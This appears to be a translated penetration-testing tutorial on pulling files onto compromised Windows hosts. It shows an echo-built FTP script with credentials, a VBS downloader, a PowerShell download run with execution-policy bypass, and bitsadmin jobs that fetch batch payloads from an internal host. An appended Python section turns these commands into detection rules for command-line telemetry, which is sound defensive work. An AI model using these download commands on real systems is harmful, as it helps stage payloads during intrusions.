Intranet File Download and Transfer

Windows

0x00 FTP

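rem Connect to the FTP server
echo open 192.168.72.14 21 >> 1.txt
rem Username
echo test>>1.txt
rem Password
echo 111111>>1.txt
rem Switch to binary transfer mode
echo bin>>1.txt
rem Download the file
echo get fw.sh>>1.txt
rem Close the FTP session
echo bye>>1.txt

After entering the commands above, a file named 1.txt is created on the remote computer. Then run the command:

rem Run the ftp commands contained in 1.txt
ftp -s:1.txt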

0x01 VBS Script File Download

The test.vbs script:

echo Set xPost=createObject("Microsoft.XMLHTTP") >>test.vbs
echo xPost.Open "GET","http://192.168.72.14/1.bat",0 >>test.vbs
echo xPost.Send() >>test.vbs
echo set sGet=createObject("ADODB.Stream") >>test.vbs
echo sGet.Mode=3 >>test.vbs
echo sGet.Type=1 >>test.vbs
echo sGet.Open() >>test.vbs
echo sGet.Write xPost.ResponseBody >>test.vbs
echo sGet.SaveToFile "c:\file.zip",2 >>test.vbs

This creates test.vbs in the current directory.
Then run it:

cscript test.vbs

0x02 PowerShell

powershell -ExecutionPolicy Bypass -File .\test.ps1

Contents of test.ps1:

$d = New-Object System.Net.WebClient
$d.DownloadFile("http://192.168.72.14/1.bat","1.bat")

0x03 bitsadmin

Method 1

bitsadmin /transfer n http://192.168.72.13/1.bat c:\new\1.bat

Method 2

bitsadmin /rawreturn /transfer getfile http://192.168.72.13/1.bat c:\new\1.bat

Method 3

bitsadmin /rawreturn /transfer getpayload http://192.168.72.13/1.bat c:\new\1.bat

Method 4

bitsadmin /transfer aa http://192.168.72.13/1.bat c:\new\1.bat

Method 5

bitsadmin /create aa

bitsadmin /addfile aa http://192.168.72.13/1.bat c:\new\1.bat

bitsadmin /resume aa

bitsadmin /info aa /verbose

bitsadmin /complete aa
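
As an added example (not from the original post), the following Python applies detection patterns for the four techniques above to process command lines (such as Sysmon Event ID 1 or Security Event ID 4688 with command-line auditing) and to PowerShell script-block text. The rule names, host names and sample events are constructed for illustration; the commands in them are the ones shown on this page.

```python
import re

# One pattern per technique on this page. The WebClient rule is meant for
# PowerShell script-block text; the others are for process command lines.
RULES = {
    "ftp_script_file": re.compile(r"\bftp(?:\.exe)?\s.*-s:\S+", re.I),
    "echo_staged_vbs": re.compile(
        r"\becho\b.*(?:Microsoft\.XMLHTTP|ADODB\.Stream).*>>\s*\S+\.vbs", re.I),
    "ps_policy_bypass": re.compile(
        r"\bpowershell(?:\.exe)?\s.*-(?:ep|ex\w*)\s+bypass\b", re.I),
    "ps_webclient_download": re.compile(
        r"Net\.WebClient.*\.DownloadFile\(", re.I | re.S),
    "bitsadmin_remote_file": re.compile(
        r"\bbitsadmin(?:\.exe)?\s.*/(?:transfer|addfile)\s.*https?://", re.I),
}
URL = re.compile(r"https?://[^\s\"')]+", re.I)

# Constructed sample telemetry: (hypothetical host, command line or script text).
SAMPLE_EVENTS = [
    ("WS01", r"ftp -s:1.txt"),
    ("WS01", r'cmd /c echo Set xPost=createObject("Microsoft.XMLHTTP") >>test.vbs'),
    ("WS02", r"powershell -ExecutionPolicy Bypass -File .\test.ps1"),
    ("WS02", '$d = New-Object System.Net.WebClient\n'
             '$d.DownloadFile("http://192.168.72.14/1.bat","1.bat")'),
    ("WS03", r"bitsadmin /transfer n http://192.168.72.13/1.bat c:\new\1.bat"),
    ("WS03", r"bitsadmin /addfile aa http://192.168.72.13/1.bat c:\new\1.bat"),
    ("WS04", r"bitsadmin /list /allusers"),   # benign: no remote file added
    ("WS04", r"ftp 192.168.72.14"),           # interactive session, no -s: script
    ("WS04", r"powershell -NoProfile -Command Get-Process"),
]

def classify(text):
    """Return (sorted names of matching rules, URLs found when any rule matched)."""
    hits = sorted(name for name, rx in RULES.items() if rx.search(text))
    return hits, (URL.findall(text) if hits else [])

def triage(events):
    """Return one finding per flagged (host, text) event, in input order."""
    findings = []
    for host, text in events:
        hits, urls = classify(text)
        if hits:
            findings.append({"host": host, "rules": hits, "urls": urls})
    return findings

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

The multi-step bitsadmin job (Method 5) is caught at the `/addfile` step; `/create`, `/resume` and `/complete` carry no URL and are not flagged on their own.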